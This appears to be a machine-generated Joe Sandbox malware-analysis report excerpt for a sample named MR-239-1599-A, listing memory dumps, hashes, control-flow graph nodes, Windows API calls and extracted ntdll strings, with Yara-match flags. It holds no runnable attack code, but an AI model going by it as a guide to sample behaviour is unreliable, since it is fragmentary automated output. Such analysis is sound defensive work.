                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27A18336E00209CFCF0ADFB4C58459EBBB2FF85304B1549AAE905AB2A1DB71E955CF50
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d44556ea1613a0f96ea8d1769f1ce5ff06a3ac244371cf61c7479aebf7383350
                                                                                                                                                                                                          • Instruction ID: 00461ac10e86860eb9b9467daedd35678ee0e98ea784a70a075c3c2713568585
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d44556ea1613a0f96ea8d1769f1ce5ff06a3ac244371cf61c7479aebf7383350
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75C10CB0D80B458BD710DF65EA5E3897BB1FBCA398F904B09D1616B2D0DBB414AACF44
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 46a75830e3ab858f2f92c0b9832235e7a21df2804491f19a174ed817a7e6e35e
                                                                                                                                                                                                          • Instruction ID: 709f9dacab8c146175006f85ff608cb27fa2a18ccc68182be27e306f33df6437
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46a75830e3ab858f2f92c0b9832235e7a21df2804491f19a174ed817a7e6e35e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB51E7B4E051198FCB08DFAAD5849AEFBF2BF88300F14D525D819A7359DB34A941CFA0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b7f14ebbdb4b6f8fd1404f45e82d6cf4dacc926518fc6428395fee6ea3e5760e
                                                                                                                                                                                                          • Instruction ID: 825ddb03930f072fea24fd3dd57ffe13f43ce47af797c5d1f92318cfaf32adc2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7f14ebbdb4b6f8fd1404f45e82d6cf4dacc926518fc6428395fee6ea3e5760e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA5175B4D016188BEB68CF2AD95479DBAF3AFC9300F14C5EAD40DA7264EB750A95CF40
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 576deb5fae00167dbffc079c3b190f30bc7997f661f1f2b78aa2441d9659f60f
                                                                                                                                                                                                          • Instruction ID: 63fd2fc18424ce6566c829c5cd18c1e3b266f34b7b856ded1f08586c4bf98d20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 576deb5fae00167dbffc079c3b190f30bc7997f661f1f2b78aa2441d9659f60f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC41ECB1D057598BEB29CF6BD84478ABBF3AFC9210F18C0E6C448AB165DB750985CF50

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:1.2%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                                                                                          Signature Coverage:7.5%
                                                                                                                                                                                                          Total number of Nodes:146
                                                                                                                                                                                                          Total number of Limit Nodes:12

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 333 417673-41769c call 42de13 336 4176a2-4176b0 call 42e333 333->336 337 41769e-4176a1 333->337 340 4176c0-4176d1 call 42c7e3 336->340 341 4176b2-4176bd call 42e5d3 336->341 346 4176d3-4176e7 LdrLoadDll 340->346 347 4176ea-4176ed 340->347 341->340 346->347
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176E5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Load
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2234796835-0

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 353 42b233-42b26f call 404933 call 42c2f3 NtClose
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3535843008-0

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 367 1532b60-1532b6c LdrInitializeThunk
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 369 1532df0-1532dfc LdrInitializeThunk
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 368 1532c70-1532c7c LdrInitializeThunk
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                                                          • API String ID: 1836367815-224894077

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                                                          • API String ID: 1836367815-224894077

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 38 42b5a3-42b5e4 call 404933 call 42c2f3 RtlFreeHeap
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B5DF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                          • String ID: !dA
                                                                                                                                                                                                          • API String ID: 3298025750-3330550368

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 348 42b553-42b597 call 404933 call 42c2f3 RtlAllocateHeap
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,0041DEAB,?,?,00000000,?,0041DEAB,?,?,?), ref: 0042B592
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1279760036-0

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 358 42b5f3-42b62f call 404933 call 42c2f3 ExitProcess
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,00000000,?,?,A337B7DB,?,?,A337B7DB), ref: 0042B62A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 621844428-0

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 363 1532c0a-1532c0f 364 1532c11-1532c18 363->364 365 1532c1f-1532c26 LdrInitializeThunk 363->365
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • 8, xrefs: 015652E3
                                                                                                                                                                                                          • Critical section address., xrefs: 01565502
                                                                                                                                                                                                          • Thread identifier, xrefs: 0156553A
                                                                                                                                                                                                          • Address of the debug info found in the active list., xrefs: 015654AE, 015654FA
                                                                                                                                                                                                          • corrupted critical section, xrefs: 015654C2
                                                                                                                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015654E2
                                                                                                                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0156540A, 01565496, 01565519
                                                                                                                                                                                                          • Invalid debug info address of this critical section, xrefs: 015654B6
                                                                                                                                                                                                          • double initialized or corrupted critical section, xrefs: 01565508
                                                                                                                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015654CE
                                                                                                                                                                                                          • Critical section address, xrefs: 01565425, 015654BC, 01565534
                                                                                                                                                                                                          • Critical section debug info address, xrefs: 0156541F, 0156552E
                                                                                                                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01565543
                                                                                                                                                                                                          • undeleted critical section in freed memory, xrefs: 0156542B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                          • API String ID: 0-2368682639
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015622E4
                                                                                                                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01562412
                                                                                                                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0156261F
                                                                                                                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015624C0
                                                                                                                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01562624
                                                                                                                                                                                                          • @, xrefs: 0156259B
                                                                                                                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01562506
                                                                                                                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01562602
                                                                                                                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015625EB
                                                                                                                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01562498
                                                                                                                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01562409
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • VerifierDebug, xrefs: 01578CA5
                                                                                                                                                                                                          • VerifierFlags, xrefs: 01578C50
                                                                                                                                                                                                          • VerifierDlls, xrefs: 01578CBD
                                                                                                                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01578A67
                                                                                                                                                                                                          • HandleTraces, xrefs: 01578C8F
                                                                                                                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 01578B8F
                                                                                                                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01578A3D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015499ED
                                                                                                                                                                                                          • apphelp.dll, xrefs: 014E6496
                                                                                                                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01549A2A
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01549A11, 01549A3A
                                                                                                                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01549A01
                                                                                                                                                                                                          • LdrpInitShimEngine, xrefs: 015499F4, 01549A07, 01549A30
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01562178
                                                                                                                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01562160, 0156219A, 015621BA
                                                                                                                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0156219F
                                                                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01562180
                                                                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015621BF
                                                                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01562165
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • LdrpInitializeImportRedirection, xrefs: 01568177, 015681EB
                                                                                                                                                                                                          • LdrpInitializeProcess, xrefs: 0152C6C4
                                                                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01568181, 015681F5
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0152C6C3
                                                                                                                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 015681E5
                                                                                                                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01568170
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 01532DF0: LdrInitializeThunk.NTDLL ref: 01532DFA
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530BA3
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530BB6
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530D60
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01530D74
                                                                                                                                                                                                          Memory Dump Source
